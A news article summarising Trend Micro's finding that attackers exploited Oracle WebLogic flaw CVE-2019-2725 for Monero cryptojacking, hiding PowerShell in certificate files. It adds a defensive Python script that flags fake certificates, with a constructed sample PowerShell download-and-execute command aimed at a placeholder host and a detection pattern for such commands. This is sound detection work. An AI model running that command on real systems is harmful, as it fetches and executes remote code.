Cybersecurity firm Trend Micro has confirmed that attackers have been exploiting a vulnerability in Oracle WebLogic Server to install Monero (XMR) mining malware, while using certificate files as an obfuscation trick. The news was revealed in a Trend Micro blog post published on June 10.
As previously reported, forms of stealth crypto mining are also referred to by the industry term cryptojacking: the practice of installing malware that uses a computer's processing power to mine cryptocurrencies without the owner's consent or knowledge.
According to Trend Micro's post, a security patch for the Oracle WebLogic vulnerability (CVE-2019-2725), reportedly caused by a deserialization error, was released earlier this spring; the flaw is catalogued in the National Vulnerability Database.
However, Trend Micro cites reports that emerged on the SANS ISC InfoSec Forums alleging that the vulnerability had already been exploited for cryptojacking purposes, and confirms that it has verified and analyzed the allegations.
The firm notes that the identified attacks deployed what it describes as "an interesting twist", namely that "the malware hides its malicious codes in certificate files as an obfuscation tactic":
“The idea of using certificate files to hide malware is not a new one […] By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal — especially when establishing HTTPS connections.”
Trend Micro's analysis begins by noting that the malware exploits CVE-2019-2725 to execute a PowerShell command, prompting the download of a certificate file from the command-and-control server.
After continuing to trace its steps and characteristics, including the installation of the XMR miner payload, Trend Micro notes an apparent anomaly in its current deployment:
“[O]ddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier. This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.”
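The defender's counterpart to the tactic described above is a check on whether a file that looks like a certificate actually is one. The following Python script is an added example, not Trend Micro's code and not the malware's: it base64-decodes the body of each PEM block in a file and asks whether the result is DER-encoded ASN.1, which a genuine certificate is, or printable text such as a PowerShell command. Both sample inputs are constructed here; the "good" sample is a minimal ASN.1 SEQUENCE standing in for a real certificate, and the indicator list is illustrative rather than taken from the post.

```python
"""Triage PEM 'certificate' files whose base64 body may be a hidden payload.

Added example for illustration; sample inputs below are constructed.
"""
import base64
import binascii
import re

# PEM block: label in the BEGIN line must match the END line.
PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)

# Illustrative indicators of a PowerShell download-and-execute command.
SUSPICIOUS = re.compile(r"powershell|iex|invoke-expression|downloadstring|-enc", re.I)


def pem_blocks(text):
    """Yield (label, base64 body with all whitespace removed) for each PEM block."""
    for m in PEM_RE.finditer(text):
        yield m.group(1), "".join(m.group(2).split())


def der_length(data):
    """Total encoded length of the outer DER SEQUENCE, or None if data is not one.

    A DER certificate starts with tag 0x30 (SEQUENCE) followed by a short
    (< 0x80) or long-form (0x8N then N length bytes) length field.
    """
    if len(data) < 2 or data[0] != 0x30:
        return None
    first = data[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    if n == 0 or n > 4 or len(data) < 2 + n:
        return None
    return 2 + n + int.from_bytes(data[2:2 + n], "big")


def as_text(data):
    """Return data as a string if it is entirely printable UTF-8 or UTF-16LE text."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            s = data.decode(enc)
        except UnicodeDecodeError:
            continue
        if s and all(c.isprintable() or c in "\r\n\t" for c in s):
            return s
    return None


def classify(data):
    """'der' if the outer SEQUENCE length matches the body, 'text' if printable, else 'binary'."""
    if der_length(data) == len(data):
        return "der"
    return "text" if as_text(data) is not None else "binary"


def triage(text):
    """Return a list of (label, kind, verdict, hint) tuples, one per PEM block."""
    results = []
    for label, body in pem_blocks(text):
        try:
            data = base64.b64decode(body, validate=True)
        except binascii.Error:
            results.append((label, "invalid-base64", "suspicious", None))
            continue
        kind = classify(data)
        hint = None
        if kind == "text":
            m = SUSPICIOUS.search(as_text(data))
            hint = m.group(0) if m else "non-DER text payload"
        results.append((label, kind, "ok" if kind == "der" else "suspicious", hint))
    return results


def wrap_pem(body_b64, label="CERTIFICATE"):
    """Wrap a base64 string in PEM armour, 64 characters per line."""
    lines = [body_b64[i:i + 64] for i in range(0, len(body_b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


# Constructed sample: a minimal DER SEQUENCE { INTEGER 1 }, not a real certificate.
GOOD_PEM = wrap_pem("MAMCAQE=")

# Constructed sample: a PowerShell download cradle disguised as a certificate body.
PAYLOAD = b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""
BAD_PEM = wrap_pem(base64.b64encode(PAYLOAD).decode())

if __name__ == "__main__":
    for name, sample in (("good", GOOD_PEM), ("bad", BAD_PEM)):
        for label, kind, verdict, hint in triage(sample):
            print(f"{name}: {label} body is {kind} -> {verdict}" + (f" ({hint})" if hint else ""))
```

A self-consistent DER header is necessary but not sufficient evidence of a real certificate: this check catches the case the post describes, where the base64 body is the command itself, and would need a full X.509 parser to flag a payload tucked inside an otherwise valid certificate structure.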
The post concludes with a recommendation that companies using WebLogic Server update their software to the latest version with the security patch in order to mitigate the risk of cryptojacking.
As recently reported, Trend Micro detected a significant uptick in XMR cryptojacking targeting China-based systems this spring, in a campaign mimicking earlier activity that had used an obfuscated PowerShell script to deliver XMR-mining malware.